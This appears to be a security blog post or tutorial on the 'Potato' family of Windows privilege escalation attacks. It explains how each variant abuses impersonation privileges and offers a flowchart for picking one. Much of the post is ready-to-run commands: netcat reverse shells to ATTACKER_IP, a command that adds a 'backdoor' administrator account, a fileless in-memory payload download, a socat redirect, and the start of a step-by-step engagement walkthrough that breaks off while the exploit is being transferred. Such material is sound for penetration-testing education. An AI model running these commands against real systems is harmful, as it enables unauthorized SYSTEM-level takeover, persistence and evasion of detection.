The Potato Family — Windows Privilege Escalation (2016–2024)
Table of Contents
TL;DR
Potato attacks exploit Windows service accounts that hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. The core technique forces a privileged process (usually SYSTEM) to authenticate to an attacker-controlled server via NTLM, then impersonates the captured token to spawn a SYSTEM shell. Since 2016, over a dozen variants have emerged — each bypassing a specific Microsoft patch or restriction. This post maps the entire family: how each variant works, why the previous one stopped working, and when to use which.
┌─────────────────────────────────────────────────────────────────────┐
│ │
│ YOU ARE HERE ──► SYSTEM SHELL │
│ (IIS AppPool, (NT AUTHORITY\SYSTEM) │
│ MSSQL Service, │
│ any svc account) │
│ │
│ Requirement: SeImpersonatePrivilege or SeAssignPrimaryTokenPriv │
│ │
└─────────────────────────────────────────────────────────────────────┘
Foundations — Why Potato Attacks Exist
Before diving into individual variants, it is essential to understand the Windows mechanisms that make this entire attack class possible.
Windows Access Tokens
Every process in Windows runs under a security context defined by an access token. This token contains the user’s SID, group memberships, and privileges. When a process needs to act on behalf of another user, it can impersonate that user’s token — effectively assuming their identity and privileges.
There are four levels of impersonation in Windows [1]:
| Level | Description |
|---|---|
| Anonymous | Server cannot identify or impersonate the client |
| Identify | Server can identify the client but cannot impersonate |
| Impersonate | Server can impersonate the client on the local system |
| Delegate | Server can impersonate the client on remote systems |
Potato attacks target the Impersonate level — they trick a SYSTEM-level process into authenticating, capture its token at impersonation level, and use it to spawn a new process.
SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege
These two privileges are the gatekeepers of token impersonation [2]:
- SeImpersonatePrivilege — Allows a process to impersonate a client after authentication. Granted by default to service accounts (IIS, MSSQL, etc.).
- SeAssignPrimaryTokenPrivilege — Allows a process to assign a primary token to a new process. Used with
CreateProcessAsUser().
You can check if a compromised account holds these privileges:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Windows\system32> whoami /priv │
│ │
│ PRIVILEGES INFORMATION │
│ ---------------------- │
│ │
│ Privilege Name Description State │
│ ============================= ================================ ========= │
│ SeImpersonatePrivilege Impersonate a client Enabled │
│ SeAssignPrimaryTokenPrivilege Replace a process level token Enabled │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
If either privilege is present, the account is a candidate for Potato attacks.
Service accounts that typically hold these privileges by default:
| Account | SeImpersonate | SeAssignPrimaryToken |
|---|---|---|
IIS APPPOOL\DefaultAppPool |
Yes | Yes |
NT AUTHORITY\LOCAL SERVICE |
Yes | Yes |
NT AUTHORITY\NETWORK SERVICE |
Yes | Yes |
MSSQL Service Accounts |
Yes | Yes |
Identifying Target Architecture
Before downloading any exploit binary, check the target architecture:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\> wmic os get osarchitecture │
│ OSArchitecture │
│ 64-bit │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
This determines whether to use x86 or x64 builds of the tools.
DCOM, OXID Resolution, and NTLM Authentication
Most Potato variants abuse the Distributed Component Object Model (DCOM) infrastructure — specifically, how Windows resolves COM object locations through the OXID Resolver service on port 135 [3].
The attack flow at the protocol level:
- The attacker instantiates a COM object with a specific CLSID, directing it to authenticate against an attacker-controlled endpoint.
- The COM subsystem (running as SYSTEM) attempts to resolve the object location via the OXID Resolver.
- During this resolution, SYSTEM sends an NTLM authentication request to the attacker.
- The attacker captures the NTLM token and uses it to impersonate SYSTEM.
This mechanism — forcing a privileged process to authenticate to an attacker-controlled listener — is the foundation of nearly every Potato variant.
Named Pipes and Token Capture
Several variants use Named Pipes as the authentication endpoint instead of a network listener [4]. When a privileged client connects to a named pipe, the pipe server can call ImpersonateNamedPipeClient() to assume the client’s security context. This avoids network-level restrictions entirely and works even when all outbound ports are blocked.
Unified Attack Flow
Despite their differences, all Potato attacks share a common core pattern. The following diagram illustrates the shared flow and where each variant diverges:
┌──────────────────────────────────────────────────────────────────────────────┐
│ POTATO ATTACK — CORE FLOW │
└──────────────────────────────────────────────────────────────────────────────┘
┌────────────────┐ ┌────────────────────┐ ┌────────────────────┐
│ Low-Priv │ │ Windows OS │ │ SYSTEM │
│ Service │ │ (DCOM/RPC) │ │ Token │
│ Account │ │ │ │ │
│ │ │ │ │ │
│ SeImpersonate │ │ │ │ │
│ Privilege │ │ │ │ │
└───────┬────────┘ └─────────┬──────────┘ └─────────┬──────────┘
│ │ │
│ 1. Trigger DCOM/RPC │ │
│ ─────────────────────────►│ │
│ │ │
│ 2. Force NTLM Auth │ │
│◄───────────────────────── │ │
│ │ │
│ 3. Capture/Relay Token │
│ ───────────────────────────────────────────────────────►│
│ │ │
│ 4. Impersonate SYSTEM │
│◄────────────────────────────────────────────────────────│
│ │ │
┌────▼────────┐
│ SYSTEM │
│ Shell │
└─────────────┘
┌──────────────────────────────────────────────────────────────────────────────┐
│ WHERE EACH VARIANT DIVERGES: │
│ │
│ Step 1 (Trigger) │ Step 2 (Auth) │ Step 3 (Relay) │
│ ────────────────────────┼───────────────────────┼────────────────────────── │
│ Hot: NBNS + WPAD │ HTTP NTLM │ HTTP → SMB │
│ Rotten: DCOM BITS │ DCOM NTLM │ TCP Sockets │
│ Juicy: Custom CLSID │ DCOM NTLM │ COM Server │
│ Rogue: Fake OXID │ RPC NTLM │ Named Pipe │
│ Sweet: Multi-vector │ DCOM NTLM │ Named Pipe │
│ God: Named Pipe RPC │ RPC NTLM │ Direct Pipe │
│ Silver: DCOM Exploit │ NTLM Relay │ Cross-Session │
└─────────────────────────┴───────────────────────┴───────────────────────────┘
The Potato Timeline
The evolution of Potato attacks reflects a decade-long cat-and-mouse game between researchers and Microsoft. Each patch prompted a new bypass, each bypass prompted a new restriction:
2016 2018 2020 2021–2022 2023–2024
│ │ │ │ │
▼ ▼ ▼ ▼ ▼
┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────────┐ ┌──────────┐
│ Hot │ │ Juicy │ │ Rogue │ │ God │ │ Silver │
│ Potato │ │ Potato │ │ Potato │ │ Potato │ │ Potato │
│NBNS+WPAD │ │ CLSID │ │Fake OXID │ │ Named Pipe │ │NTLM Relay│
└────┬─────┘ └────┬─────┘ └────┬─────┘ └──────┬───────┘ └──────────┘
│ │ │ │
┌────┴─────┐ │ ┌────┴─────┐ ┌───────┴────────┐
│ Rotten │ │ │ Sweet │ │ Coerced │
│ Potato │ MS patched │ Potato │ │ Potato (2023) │
│DCOM BITS │ DCOM on │Multi-vec │ │ RPC Coercion │
└──────────┘ Server 2019+ └──────────┘ └───────┬────────┘
│
┌──────────┐ ┌───────┴────────┐
│ Generic │ │ Sigma │
│ Potato │ │ Potato (2023) │
│HTTP+Pipe │ │ GodPotato fork│
│ (2021) │ └────────────────┘
└──────────┘
┌────────────────┐
│ JuicyPotatoNG │
│ SSPI+Kerberos │
│ (2022) │
└────────────────┘
Comparative Table
The following table summarizes every major variant, its mechanism, requirements, and current patch status:
| Variant | Year | CVE | Mechanism | Privilege Required | Windows Versions | Patched? | Tool |
|---|---|---|---|---|---|---|---|
| Hot Potato | 2016 | — | NBNS Spoofing + WPAD + NTLM Relay | SeImpersonate | 7, 8, 10, Server 2008/2012 | Yes | Tater |
| Rotten Potato | 2016 | — | DCOM BITS + NTLM Relay via TCP Sockets | SeImpersonate | 7, 8, 10, Server 2008/2012 | Partial | RottenPotatoNG |
| Juicy Potato | 2018 | — | Custom CLSID + DCOM Activation | SeImpersonate | 7, 8, 10, Server 2008/2012/2016 | Yes (2019+) | JuicyPotato |
| Rogue Potato | 2020 | — | Fake OXID Resolver + Named Pipe | SeImpersonate | All (requires outbound port) | No | RoguePotato |
| Sweet Potato | 2020 | — | Multi-vector (DCOM/WinRM/EfsRpc) + Named Pipe | SeImpersonate | 10, Server 2016/2019 | Partial | SweetPotato |
| Generic Potato | 2021 | — | HTTP + Named Pipe impersonation | SeImpersonate | All | No | GenericPotato |
| JuicyPotatoNG | 2022 | — | DCOM + SSPI Hooking + Kerberos Relay | SeImpersonate | 10, 11, Server 2019/2022 | No | JuicyPotatoNG |
| God Potato | 2022 | — | Named Pipe RPC + OXID bypass | SeImpersonate | All (2012–2022) | No | GodPotato |
| Coerced Potato | 2023 | — | RPC Coercion + Named Pipe | SeImpersonate | All | No | CoercedPotato |
| Sigma Potato | 2023 | — | Named Pipe RPC + Hooking (GodPotato fork) | SeImpersonate | 8–11, Server 2012–2022 | No | SigmaPotato |
| Silver Potato | 2024 | CVE-2024-38061 | DCOM Cross-Session + NTLM Relay | Session Access | All | Partial | Research/PoC |
Decision Flowchart — Which Potato to Use
Choosing the right variant depends on the Windows version, available privileges, and network constraints. The following flowchart provides a practical decision guide:
┌─────────────────────────────┐
│ Have SeImpersonate or │
│ SeAssignPrimaryToken? │
└──────────────┬──────────────┘
│
┌─────────▼─────────┐
│ Yes │──── No ───► Not vulnerable
└─────────┬─────────┘ to Potato attacks
│
┌──────────────▼──────────────┐
│ Windows Version? │
└──────────────┬──────────────┘
│
┌───────────────────────┼───────────────────────┐
▼ ▼ ▼
┌─────────────────────┐ ┌─────────────────────┐ ┌─────────────────────┐
│ Windows 7/10 │ │ Server 2019 │ │ Server 2022+ │
│ Server <= 2016 │ │ Windows 10 │ │ Windows 11 │
│ │ │ (post-patch) │ │ │
└──────────┬──────────┘ └──────────┬──────────┘ └──────────┬──────────┘
│ │ │
▼ │ ▼
┌─────────────────────┐ │ ┌─────────────────────┐
│ JuicyPotato │ │ │ GodPotato │
│ (easiest, │ │ │ SigmaPotato │
│ most stable) │ │ │ CoercedPotato │
└─────────────────────┘ │ │ JuicyPotatoNG │
│ └─────────────────────┘
┌──────────────▼──────────────┐
│ Can open outbound port? │
│ (e.g., port 135) │
└──────────────┬──────────────┘
│
┌──────────────┼──────────────┐
▼ ▼
┌─────────────────┐ ┌─────────────────┐
│ Yes │ │ No │
│ RoguePotato │ │ GodPotato │
│ │ │ SigmaPotato │
└─────────────────┘ │ SweetPotato │
└─────────────────┘
│
┌────────▼────────┐
│ Need stealth? │
└────────┬────────┘
Yes ─────┤
▼
┌─────────────────┐
│ SigmaPotato │
│ (fileless + │
│ built-in │
│ revshell) │
└─────────────────┘
Obtaining the Tools
Most Potato binaries are available as pre-compiled releases on GitHub. On Kali Linux, JuicyPotato is bundled:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ ls /usr/share/windows-resources/juicy-potato/ │
│ JuicyPotato.exe │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
For other tools, download the release matching the target architecture (x86 or x64):
| Tool | GitHub Releases |
|---|---|
| JuicyPotato | ohpe/juicy-potato/releases |
| GodPotato | BeichenDream/GodPotato/releases |
| SweetPotato | CCob/SweetPotato/releases |
| RoguePotato | antonioCoco/RoguePotato/releases |
| JuicyPotatoNG | antonioCoco/JuicyPotatoNG/releases |
| CoercedPotato | Prepouce/CoercedPotato/releases |
| SigmaPotato | tylerdotrar/SigmaPotato/releases |
The Variants — Deep Dive
Hot Potato (2016)
Authors: Stephen Breen (FoxGlove Security) [5]
Hot Potato was the first exploit in the family. It combined three well-known techniques into a single local privilege escalation chain:
- NBNS Spoofing — Floods the local network with NBNS responses to redirect name resolution for the WPAD host to the attacker’s IP.
- Fake WPAD Proxy — Serves a malicious
wpad.datfile that forces the system to send HTTP requests through the attacker’s proxy. - HTTP-to-SMB NTLM Relay — Captures the NTLM authentication from the proxied request and relays it to the local SMB service to execute a command as SYSTEM.
Why it worked: Windows services (like Windows Update) would automatically attempt WPAD resolution and send NTLM credentials to any proxy that requested them.
Why it died: Microsoft patched the NBNS spoofing vector and hardened WPAD resolution behavior. Modern Windows versions no longer fall for local NBNS poisoning in the same way.
Rotten Potato (2016)
Authors: Stephen Breen, Chris Mallz [6]
Rotten Potato shifted the attack from network-level spoofing to DCOM-based NTLM reflection. Instead of intercepting proxy traffic, it:
- Triggers a DCOM activation request using the BITS (Background Intelligent Transfer Service) COM object via
CoGetInstanceFromIStorage. - Intercepts the NTLM authentication via a local man-in-the-middle between a TCP listener (port 6666) and the Windows RPC service (port 135).
- Relays the NTLM negotiation and impersonates SYSTEM via
AcceptSecurityContext/ImpersonateSecurityContext.
Why it worked: DCOM activation requests are made by SYSTEM-level processes, and the NTLM tokens could be relayed locally between TCP sockets.
Why it died: Microsoft added restrictions to prevent NTLM reflection on the same machine and tightened DCOM activation security.
Juicy Potato (2018)
Authors: Andrea Pierini (decoder), Giuseppe Trotta (ohpe) [7]
Juicy Potato was the breakthrough variant — it generalized Rotten Potato by allowing the attacker to specify any CLSID (COM class identifier) for the DCOM activation trigger. This meant:
- The attacker could choose from hundreds of COM objects that run as SYSTEM.
- Different CLSIDs work on different Windows versions, making the attack highly versatile.
- The attacker controls the listening port for the NTLM authentication callback.
Basic usage:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe │
│ -a "/c whoami" -t * │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotato.exe -l 1337 -p C:\Windows\Temp\nc.exe │
│ -a "-e cmd.exe ATTACKER_IP 4444" -t * │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
With specific CLSID:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t * │
│ -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Different Windows versions require different CLSIDs. The following table lists commonly working ones:
| OS | CLSID |
|---|---|
| Windows 10 | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} |
| Windows Server 2016 | {8BC3F05E-D86B-11D0-A075-00C04FB68820} |
| Windows Server 2012 | {e60687f7-01a1-40aa-86ac-db1cbf673334} |
A complete list of CLSIDs per OS version is available at the JuicyPotato CLSID reference [7].
Why it worked: Hundreds of COM objects across Windows versions could be abused as NTLM authentication triggers, and Microsoft had no centralized fix.
Why it died: Starting with Windows Server 2019 and Windows 10 build 1809, Microsoft blocked DCOM activation on custom ports by restricting the OXID resolver to only accept connections on port 135 — which is already bound by the legitimate RPC service.
Rogue Potato (2020)
Authors: Andrea Pierini (decoder), Antonio Cocomazzi [8]
Rogue Potato bypassed the Server 2019 restrictions by deploying a fake OXID Resolver on a remote machine controlled by the attacker:
- The attacker sets up a fake OXID Resolver on a remote server (or uses port forwarding).
- Triggers a DCOM activation request that resolves the OXID through the remote fake resolver.
- The fake resolver redirects the SYSTEM authentication back to a local named pipe.
- The named pipe server captures the SYSTEM token.
Why it worked: By moving the OXID resolution off-machine, it bypassed the local port 135 restriction. The SYSTEM token was still captured locally via named pipe impersonation.
Attacker machine — redirect port 135 to victim’s listener:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ socat tcp-listen:135,reuseaddr,fork │
│ tcp:TARGET_IP:9999 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim machine — execute the exploit:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> RoguePotato.exe -r ATTACKER_IP -l 9999 │
│ -e "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Limitation: Requires the ability to redirect traffic from port 135 on a remote machine to the attacker, which is not always feasible in restricted network environments.
Sweet Potato (2020)
Author: Ceri Coburn (CCob) [9]
Sweet Potato combined multiple techniques into a single tool:
- DCOM activation abuse (similar to Rotten/Juicy Potato).
- WinRM service abuse to trigger NTLM authentication.
- EfsRpc coercion for SYSTEM authentication.
- PrintSpoofer named pipe impersonation.
- Named pipe impersonation for token capture.
It serves as a “Swiss army knife” that tries multiple trigger methods, increasing the chances of success across different Windows configurations.
Execute command:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SweetPotato.exe -p C:\Windows\System32\cmd.exe │
│ -a "/c whoami" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SweetPotato.exe -p C:\Windows\Temp\nc.exe │
│ -a "-e cmd.exe ATTACKER_IP 4444" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Generic Potato (2021)
Author: Micah Van Deusen [19]
Generic Potato takes a different angle — instead of abusing DCOM or RPC, it exploits HTTP-based authentication combined with Named Pipe impersonation:
- Starts a local HTTP server that triggers NTLM authentication.
- Redirects a privileged process to authenticate against the HTTP endpoint.
- Captures the token and impersonates via named pipe.
Why it matters: Useful in scenarios where DCOM is locked down but HTTP-based coercion is available. Works on all Windows versions since it avoids the DCOM activation path entirely.
Basic usage:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GenericPotato.exe -m HTTP -p C:\Windows\Temp\nc.exe │
│ -a "ATTACKER_IP 4444 -e cmd.exe" -e HTTP │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
JuicyPotatoNG (2022)
Authors: Antonio Cocomazzi, Andrea Pierini (decoder-it) [18]
JuicyPotatoNG is the successor to JuicyPotato, designed to work on Windows 10/11 and Server 2019/2022 — the exact versions where JuicyPotato was patched:
- Hooks into the SSPI (Security Support Provider Interface) to intercept authentication at the API level.
- Uses Kerberos relay within the local authentication flow.
- Captures and impersonates the SYSTEM token.
Unlike original JuicyPotato, it does not require choosing a CLSID — it automatically finds a working COM object.
Basic usage:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exe │
│ -a "/c C:\Windows\Temp\nc.exe ATTACKER_IP 4444 -e cmd.exe" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Why it matters: Drop-in replacement for JuicyPotato on modern Windows. No CLSID hunting, no port forwarding, works where the original was patched.
God Potato (2022)
Author: BeichenDream [10]
God Potato took a fundamentally different approach by abusing the Named Pipe mechanism directly, bypassing the need for DCOM activation entirely:
- Creates a named pipe server.
- Uses RPC calls to trigger SYSTEM-level authentication to the named pipe.
- Impersonates the SYSTEM token from the pipe connection.
Why it matters: God Potato works on nearly all Windows versions from Server 2012 to Server 2022, does not require any outbound network access, and bypasses all DCOM-related patches.
Prerequisite — .NET Framework 2.0, 3.5, or 4.0:
GodPotato provides separate binaries for each .NET version (GodPotato-NET2.exe, GodPotato-NET35.exe, GodPotato-NET4.exe). Choose the one matching the target:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> reg query "HKLM\SOFTWARE\Microsoft\NET Framework │
│ Setup\NDP" /s | findstr /i "version" │
│ │
│ Version REG_SZ 2.0.50727.4927 │
│ Version REG_SZ 3.5.30729.4926 │
│ Version REG_SZ 4.8.04084 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Execute command:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GodPotato.exe -cmd "cmd /c whoami" │
│ [*] CombaseModule: 0x140000000 │
│ [*] DispatchTable: 0x140000000 │
│ [*] UseProtseqFunction: 0x140000000 │
│ [*] UseProtseqFunctionParamCount: 6 │
│ [*] ImpsersonateClient: OK │
│ [*] Token: OK │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GodPotato.exe -cmd "C:\Windows\Temp\nc.exe │
│ -e cmd.exe ATTACKER_IP 4444" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Add admin user:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> GodPotato.exe -cmd "net user backdoor P@ssw0rd /add │
│ && net localgroup administrators backdoor /add" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Coerced Potato (2023)
Authors: Prepouce, Hack0ura [11]
Coerced Potato leverages multiple RPC coercion techniques to force SYSTEM authentication to a named pipe. It aggregates several known RPC interfaces (similar to PetitPotam, PrinterBug, etc.) but targets local privilege escalation instead of remote relay:
- Uses
EfsRpcOpenFileRaw,SpoolService, and other RPC methods. - Triggers SYSTEM-level authentication to an attacker-controlled named pipe.
- Impersonates the captured token.
Sigma Potato (2023)
Author: Tyler McCann (tylerdotrar) [17]
Sigma Potato is a fork of GodPotato that shares the same underlying Named Pipe RPC exploitation technique but adds significant operational improvements for real-world engagements:
- Fileless execution — Full .NET reflection support, allowing the binary to be loaded and executed entirely in memory without touching disk.
- Built-in reverse shell — Native
--revshellflag, no need for external tools like netcat. - Command length bypass — Overcomes GodPotato’s 1024-character limit via process environment block inheritance (up to 32,767 characters).
- PowerShell wrapper —
Invoke-SigmaPotato.ps1with embedded Gzip+Base64 binary for single-file deployment. - AV evasion — Rudimentary heuristics bypass via
VirtualAllocExNuma()call.
Two binaries are provided: SigmaPotato.exe (.NET 4.8) and SigmaPotatoCore.exe (.NET 2.0/3.5).
Basic execution:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SigmaPotato.exe whoami │
│ [*] SigmaPotato by @tylerdotrar │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Built-in reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> SigmaPotato.exe --revshell ATTACKER_IP 4444 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Fileless execution via .NET reflection (no binary on disk):
┌─────────────────────────────────────────────────────────────────────────────┐
│ Windows PowerShell _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ PS C:\> [System.Reflection.Assembly]::Load( │
│ (New-Object Net.WebClient).DownloadData( │
│ 'http://ATTACKER_IP/SigmaPotato.exe')) │
│ │
│ PS C:\> [SigmaPotato]::Main("whoami") │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Why it matters: Same exploitation power as GodPotato, but designed for stealth — fileless execution makes it harder to detect, and the built-in reverse shell eliminates the need to transfer additional tools like netcat.
Silver Potato (2024)
Authors: Andrea Pierini (decoder) [12]
Silver Potato introduced a new attack surface — cross-session DCOM activation combined with NTLM relay:
- Exploits DCOM object activation permissions that allow cross-session access.
- Forces a privileged process to authenticate via NTLM to an attacker-controlled endpoint across sessions.
- Relays the captured NTLM authentication to escalate privileges.
The author initially explored Kerberos relay as an attack path, but it proved unsuccessful due to impersonation level limitations (only “Identify” level on the second authentication, which is unusable for relay). The working exploit relies on NTLM relay.
CVE: CVE-2024-38061
Related: Non-Potato Alternatives
The following tools are not part of the Potato family but exploit the same SeImpersonatePrivilege to achieve SYSTEM. They are commonly used in the same scenarios and are worth knowing as alternatives when Potato variants fail or are impractical.
PrintSpoofer
Author: Itm4n [16]
PrintSpoofer abuses the Windows Print Spooler service instead of DCOM/RPC. It creates a named pipe with a predictable name that the spooler service will connect to as SYSTEM, then impersonates the captured token.
The approach is simpler than most Potato variants — no COM objects, no OXID resolution, no network listeners:
- Creates a named pipe server with a specific name pattern.
- Triggers the Print Spooler service to connect to the pipe.
- Impersonates the SYSTEM token from the pipe connection.
Supported versions: Windows 10, Server 2016/2019.
Interactive SYSTEM shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> PrintSpoofer.exe -i -c cmd │
│ [+] Found privilege: SeImpersonatePrivilege │
│ [+] Named pipe listening... │
│ [+] CreateProcessAsUser() OK │
│ │
│ C:\Windows\system32> whoami │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe │
│ ATTACKER_IP 4444 -e cmd.exe" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Download: itm4n/PrintSpoofer/releases
PrintSpoofer is often the simplest and fastest option — no CLSIDs, no port forwarding, no external dependencies. When in doubt on Server 2019, try PrintSpoofer first.
Practical Demonstration
The following walkthrough simulates a realistic privilege escalation engagement — from an initial low-privilege shell to full SYSTEM access. Two scenarios are covered: one targeting an older Windows version with JuicyPotato, and another targeting a modern version with GodPotato.
Step 1 — Initial Access
Assume you have obtained a low-privilege shell on a Windows target — this could be through a webshell on IIS, a SQL Server xp_cmdshell, or any service account compromise.
The first thing to do is identify who you are:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> whoami │
│ iis apppool\defaultapppool │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
You are running as a service account. This is the starting point for Potato attacks.
Step 2 — Enumerate Privileges
Check if the account holds impersonation privileges:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> whoami /priv │
│ │
│ PRIVILEGES INFORMATION │
│ ---------------------- │
│ │
│ Privilege Name Description State │
│ ============================= ================================ ========= │
│ SeAssignPrimaryTokenPrivilege Replace a process level token Disabled │
│ SeIncreaseQuotaPrivilege Adjust memory quotas for process Disabled │
│ SeShutdownPrivilege Shut down the system Disabled │
│ SeAuditPrivilege Generate security audits Disabled │
│ SeChangeNotifyPrivilege Bypass traverse checking Enabled │
│ SeUndockPrivilege Remove computer from dock Disabled │
│ SeImpersonatePrivilege Impersonate a client Enabled │
│ SeCreateGlobalPrivilege Create global objects Enabled │
│ SeIncreaseWorkingSetPrivilege Increase a process working set Disabled │
│ SeTimeZonePrivilege Change the time zone Disabled │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
SeImpersonatePrivilege is Enabled — Potato attacks are viable.
A quick filter to confirm:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> whoami /priv | findstr /i "impersonate assign" │
│ SeAssignPrimaryTokenPrivilege Replace a process level token Disabled │
│ SeImpersonatePrivilege Impersonate a client Enabled │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Step 3 — Enumerate the Operating System
Determine the Windows version to choose the correct variant:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" │
│ │
│ OS Name: Microsoft Windows Server 2016 Standard │
│ OS Version: 10.0.14393 N/A Build 14393 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Check the architecture to download the correct binary:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> wmic os get osarchitecture │
│ OSArchitecture │
│ 64-bit │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Decision: Windows Server 2016 (pre-2019 patch) + 64-bit + SeImpersonatePrivilege → JuicyPotato.
Step 4 — Transfer the Exploit
From the attacker machine, host the binary and transfer it to the target. Multiple methods work:
Attacker — start a Python HTTP server:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ cp /usr/share/windows-resources/juicy-potato/ │
│ JuicyPotato.exe . │
│ [attacker@kali ~]$ python3 -m http.server 8080 │
│ Serving HTTP on 0.0.0.0 port 8080 ... │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim — download the binary:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
